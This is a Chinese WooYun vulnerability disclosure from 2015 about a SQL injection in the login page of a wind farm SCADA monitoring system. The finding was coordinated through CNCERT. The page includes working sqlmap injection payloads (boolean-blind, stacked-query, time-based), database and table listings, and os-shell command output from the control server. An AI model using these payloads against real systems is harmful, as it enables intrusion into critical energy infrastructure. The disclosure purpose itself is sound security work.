当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164336

漏洞标题:新能源安全之格盟国际某系统SQL注入DBA权限(可监控整个风电场群\可内网渗透)

相关厂商:格盟国际能源有限公司

漏洞作者: 路人甲

提交时间:2015-12-25 13:30

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-25: 细节已通知厂商并且等待厂商处理中
2015-12-29: 厂商已经确认,细节仅向厂商公开
2016-01-08: 细节向核心白帽子及相关领域专家公开
2016-01-18: 细节向普通白帽子公开
2016-01-28: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

整个风电场的监控

详细说明:

风电场群实时监控系统

**.**.**.**:88/


username处存在注入, PostgreSQL数据库,DBA权限,可执行os-shell

Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1' AND 8282=8282 AND 'VJwJ'='VJwJ&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1';SELECT PG_SLEEP(5)--&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44
    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJODk3ODY2NTcxZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKSUJ0bl9Mb2dpbs4K6TtxSI7L5NbwKyKK9aeqcUUq&TB_UserName='or'1'='1' AND 4478=(SELECT 4478 FROM PG_SLEEP(5)) AND 'DVAr'='DVAr&TB_PassWord=123456&IBtn_Login.x=40&IBtn_Login.y=44
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: PostgreSQL
available databases [9]:
[*] "140212"
[*] "140213"
[*] "140214"
[*] "140901"
[*] "140903"
[*] "140911"
[*] information_schema
[*] pg_catalog
[*] public


Database: public
[65 tables]
+-----------------------------------+
| calculatefieldinfo                |
| fieldset                          |
| groupinfo                         |
| log                               |
| pathdescr                         |
| reportsqlconfig                   |
| stdpowercurve                     |
| tb_alarm_log                      |
| tb_alarmsetting                   |
| tb_command_log                    |
| tb_commandsending_histricalrecord |
| tb_commfault                      |
| tb_display_kind                   |
| tb_eq_kind                        |
| tb_equipment                      |
| tb_equipment1                     |
| tb_equipment_success_time         |
| tb_event_log                      |
| tb_fault_code                     |
| tb_fault_sms_setting              |
| tb_group_equipment                |
| tb_groups                         |
| tb_language                       |
| tb_menuitem                       |
| tb_path_descr                     |
| tb_permission                     |
| tb_permission2                    |
| tb_preadapter                     |
| tb_procmd                         |
| tb_productionplan                 |
| tb_propaths                       |
| tb_propathsconfig                 |
| tb_propathsconfig1                |
| tb_protocol                       |
| tb_protocol_bak                   |
| tb_proxy_conf                     |
| tb_realtime_fault_stack           |
| tb_report_set                     |
| tb_reportshowfield                |
| tb_reporttemplate                 |
| tb_resources                      |
| tb_role                           |
| tb_role_menu                      |
| tb_role_user                      |
| tb_role_windfarm                  |
| tb_send_information               |
| tb_synlog                         |
| tb_system_log                     |
| tb_tendata                        |
| tb_usbkey_blacklist               |
| tb_user_config                    |
| tb_user_info                      |
| tb_user_service_config            |
| tb_users                          |
| tb_userwebevent                   |
| tb_wf_vpn_ip_address              |
| tb_windfarm                       |
| tb_windfarm_map_config            |
| tb_wt_avail_algorithm_set         |
| tb_wterrorinfo                    |
| tb_wtstatusinfo                   |
| tb_wttype                         |
| userloginlog                      |
| v_propaths                        |
| wooyun                            |竟然有一个名为wooyun的数据库!!!不过没有数据
+-----------------------------------+


执行--os-shell服务器在内网

ip.png


net user

command standard output:    'scada-01\postgres'
command standard output:
---
\SCADA-01 µÄçջ§
-------------------------------------------------------------------------------
Administrator
---
command standard output:    'ˆ¡'
command standard output:
---
\SCADA-01 µÄçջ§
-------------------------------------------------------------------------------
Administrator
---

漏洞证明:

这事一个大型的风电场群,总共包括两个风电场数百个风电设备

页面.png


风电场群1.png


风电场2.png


风电场信息

风场个数1
装机容量(kW)48000 kW
平均风速6.30 m/s
有功功率4942 kW
无功功率0 kVar
当年发电量49786880 kWh(发电量挺大的)

修复方案:

修复SQL注入
修改口令

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-29 18:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价